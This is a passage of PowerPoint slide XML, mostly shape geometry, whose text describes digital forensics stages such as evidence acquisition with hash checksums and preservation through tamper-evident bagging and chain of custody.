                  <a:pt x="7707" y="803408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29167" y="844893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61886" y="877612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103371" y="899072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151130" y="906779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4259326" y="906779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4307084" y="899072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4348569" y="877612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4381288" y="844893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4402748" y="803408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="755650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="151129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4402748" y="103371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4381288" y="61886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4348569" y="29167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4307084" y="7707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4259326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105402" y="3137661"/>
            <a:ext cx="186753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65">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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200" spc="5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200" spc="8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200" spc="8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200" spc="55">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>enance</a:t>
            </a:r>
            <a:endParaRPr sz="22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473249" y="2880360"/>
            <a:ext cx="6232525" cy="2481580"/>
            <a:chOff x="8473249" y="2880360"/>
            <a:chExt cx="6232525" cy="2481580"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8478011" y="3323844"/>
              <a:ext cx="6223000" cy="2033270"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6223000" h="2033270">
                  <a:moveTo>
                    <a:pt x="0" y="338835"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3094" y="292871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12107" y="248781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26636" y="206972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46275" y="167846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70619" y="131810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99266" y="99266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131810" y="70619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167846" y="46275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206972" y="26636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248781" y="12107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292871" y="3094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5883656" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5929620" y="3094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5973710" y="12107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6015519" y="26636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6054645" y="46275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6090681" y="70619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6123225" y="99266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151872" y="131810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6176216" y="167846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6195855" y="206972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6210384" y="248781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6219397" y="292871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6222492" y="338835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6222492" y="1694179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6219397" y="1740144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6210384" y="1784234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6195855" y="1826043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6176216" y="1865169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6151872" y="1901205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6123225" y="1933749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6090681" y="1962396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6054645" y="1986740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6015519" y="2006379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5973710" y="2020908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5929620" y="2029921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5883656" y="2033015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338836" y="2033015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292871" y="2029921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248781" y="2020908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206972" y="2006379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167846" y="1986740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131810" y="1962396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99266" y="1933749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70619" y="1901205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46275" y="1865169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26636" y="1826043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12107" y="1784234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3094" y="1740144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1694179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="338835"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9524">
              <a:solidFill>
                <a:srgbClr val="4279A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660636" y="2880360"/>
              <a:ext cx="4226560" cy="906780"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4226559" h="906779">
                  <a:moveTo>
                    <a:pt x="4074922" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="151130" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103371" y="7707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61886" y="29167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29167" y="61886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7707" y="103371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="755650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7707" y="803408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29167" y="844893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61886" y="877612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103371" y="899072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151130" y="906779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4074922" y="906779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4122680" y="899072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4164165" y="877612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4196884" y="844893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4218344" y="803408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226052" y="755650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226052" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4218344" y="103371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4196884" y="61886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4164165" y="29167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4122680" y="7707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4074922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8657081" y="2897742"/>
            <a:ext cx="5795010" cy="211518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algn="ctr" marL="439420">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="475"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>acquisition</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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5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endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="440055">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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2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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>non-repudiation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2550"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-45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dirty="0" sz="20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000" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>cryptographic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-11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000" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>hashing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="100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0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000" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>checksums.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="414020" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-45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dirty="0" sz="20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000" spc="35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>takes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10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000" spc="105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0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0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000" spc="70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>device,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10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000" spc="20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>reference </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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000" spc="10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>image,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="9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0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000" spc="60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0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0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000" spc="60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>image</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>analysis.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138928" y="6050279"/>
            <a:ext cx="6407150" cy="2390140"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6407150" h="2390140">
                <a:moveTo>
                  <a:pt x="0" y="398272"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2679" y="351824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10518" y="306950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23218" y="263949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40480" y="223120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62005" y="184761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87494" y="149171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116649" y="116649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149171" y="87494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184761" y="62005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223120" y="40480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="263949" y="23218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306950" y="10518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351824" y="2679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398272" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6008624" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055071" y="2679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6099945" y="10518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6142946" y="23218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6183775" y="40480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6222134" y="62005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6257724" y="87494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6290246" y="116649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6319401" y="149171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6344890" y="184761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6366415" y="223120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6383677" y="263949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6396377" y="306950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6404216" y="351824"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6406896" y="398272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6406896" y="1991347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6404216" y="2037795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6396377" y="2082669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6383677" y="2125671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6366415" y="2166501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6344890" y="2204861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6319401" y="2240452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6290246" y="2272976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6257724" y="2302132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6222134" y="2327623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6183775" y="2349149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6142946" y="2366412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6099945" y="2379112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055071" y="2386952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6008624" y="2389632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398272" y="2389632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351824" y="2386952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306950" y="2379112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="263949" y="2366412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223120" y="2349149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184761" y="2327623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149171" y="2302132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116649" y="2272976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87494" y="2240452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62005" y="2204861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40480" y="2166501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23218" y="2125671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10518" y="2082669"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2679" y="2037795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1991347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="398272"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="39405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335651" y="6702421"/>
            <a:ext cx="5972175" cy="1394460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229"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-45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dirty="0" sz="20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000" spc="65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>secures</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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000" spc="30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>tamper-evident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10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000" spc="30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>bagging.</a:t>
            </a:r>
            <a:endParaRPr sz="20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335"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-45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dirty="0" sz="20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000" spc="30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>protects</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114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000" spc="45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>against</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ElectroStatic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114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000" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>discharge</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(ESD).</a:t>
            </a:r>
            <a:endParaRPr sz="20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335"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-45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dirty="0" sz="20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000" spc="4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dirty="0" sz="20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000" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>documented</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10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000" spc="65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="60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dirty="0" sz="20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000" spc="40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>chain</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-11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0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0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000" spc="20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>custody.</a:t>
            </a:r>
            <a:endParaRPr sz="20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335"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="1100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-45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>It</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>secures</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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000" spc="55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>facility.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185915" y="5596128"/>
            <a:ext cx="4410710" cy="906780"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="906779">
                <a:moveTo>
                  <a:pt x="4259326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="151130" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103371" y="7707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61886" y="29167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29167" y="61886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7707" y="103371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="151130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="755650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7707" y="803408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29167" y="844893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61886" y="877612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103371" y="899072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151130" y="906780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4259326" y="906780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4307084" y="899072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4348569" y="877612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4381288" y="844893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4402748" y="803408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="755650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="151130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4402748" y="103371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4381288" y="61886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4348569" y="29167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4307084" y="7707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4259326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617334" y="5854700"/>
            <a:ext cx="35458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65">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Preservation</a:t>
            </a:r>
            <a:r>
